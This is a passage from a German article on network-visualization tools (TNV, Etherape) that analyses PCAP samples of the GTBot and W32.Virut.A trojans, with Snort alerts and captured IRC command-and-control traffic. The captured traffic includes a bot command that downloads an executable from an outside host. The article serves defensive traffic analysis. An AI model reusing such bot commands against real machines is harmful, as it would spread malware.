TNV

Das plattformunabhängige, java-basierte Visualisierungs-Tool TNV (Time-base Network Visualizer) [9] kann ebenfalls PCAP-Dateien einlesen oder direkt vom Netzwerk-Interface mitschneiden. John Goodall von http://vizsec.org hat TNV im Rahmen seines Studiums programmiert.

Auch TNV findet sich im Davix-Menü »Visualize« . Die im linken Teil der GUU dargestellten Remote-Hosts lassen sich wie die Matrix der lokalen Hosts auf der rechten Seite umordnen. Listing 5 zeigt die Snort-Alerts, die von »gtbot.pcap« getriggert werden, die entsprechende Visualisierung ist in Abbildung 5 zu sehen.

[**] [1:100000272:3] COMMUNITY BOT GTBot ver command [**]
[Classification: A Network Trojan was detected] [Priority: 1]
10/04-18:25:15.656786 84.244.1.30:5050 -> 192.168.1.1:1101
TCP TTL:64 TOS:0x0 ID:53296 IpLen:20 DgmLen:348 DF
***AP*** Seq: 0xCA5E0BB6  Ack: 0xB97E3616  Win: 0x16D0  TcpLen: 20

Abbildung 5: »gtbot.cap«

TNV lädt PCAP-Files nicht besonders schnell, es ist also etwas Geduld gefragt. Die Nützlichkeit des Ergebnisses bleibt davon jedenfalls unberührt. Der Snort-Alert zeigt die IP-Adresse »84.244.1.30« und den Port 5050 als Ursprung der Verbindung, »192.168.1.1« mit Port 1101 als Ziel. Diese Ergebnisse finden sich auch in allen drei TNV-Fenstern wieder: eingehender port-spezifischer Traffic auf der rechten Seite, die Verbindung zwischen »84.244.1.30« und »192.168.1.1« in der Mitte, sowie alle Verbindungsdetails.

TNV eignet sich hervorragend dazu, kleine Vergehen in PCAP-Files zu finden. Man darf aber nicht vergessen, den Bereich an IP-Adressen anzugeben, die dort für das lokale Netz stehen.

Etherape

Wer sich in Davix' Visualisierungsmenü umschaut, wird dort auch Etherape [10] finden, das ohne Hilfsmittel PCAP-Files laden kann und wie Rumint sie in Echtzeit wiedergeben kann, während es die Ergebnisse anzeigt.

Das PCAP-Sample »anon_sid_2000345_2003603.pcap« von http://evilfingers.com führte nach dem Einlesen zu der Snort-Ausgabe in Listing 6. Wie Zeile 1 zeigt, handelt es sich um den Virus W32.Virut.A. Er injiziert Code in laufende Prozesse, öffnet auf Port 65520 eine Backdoor und versucht Verbindungen zu IRC-Servern herzustellen.

[**] [1:2003603:3] ET TROJAN W32.Virut.A joining an IRC Channel [**]
[Classification: A Network Trojan was detected] [Priority: 1]
05/30-23:12:53.343816 210.233.108.48:1048 -> 51.93.245.116:65520
TCP TTL:128 TOS:0x0 ID:3686 IpLen:20 DgmLen:67 DF
***AP*** Seq: 0x9A24EA7C  Ack: 0x55A62BF6  Win: 0xFFFF  TcpLen: 20
[Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Virut]
[Xref => http://doc.emergingthreats.net/2003603][Xref => http://www.bitcrank.net]

Die Visualisierung mit Etherape ist in Abbildung 6 zu sehen. Der befallene Rechner hat die Adresse »51.93.245.116« mit einem geöffneten TCP-Port 65520. Die Rohdaten aus dem PCAP, wie sie auf http://evilfingers.com zu finden sind, bestätigen Snort-Alarm und Grafik:

NICK vouswcmm
USER v020501. . :-Service Pack 2
JOIN &virtu
:* PRIVMSG vouswcmm :!get http://ygyyqtqeyp.
hk/dl/loadadv735.exe
PING :i
PONG :i
JOIN &virtu

Abbildung 6: Virut.pcap in Etherape – joining an IRC channel.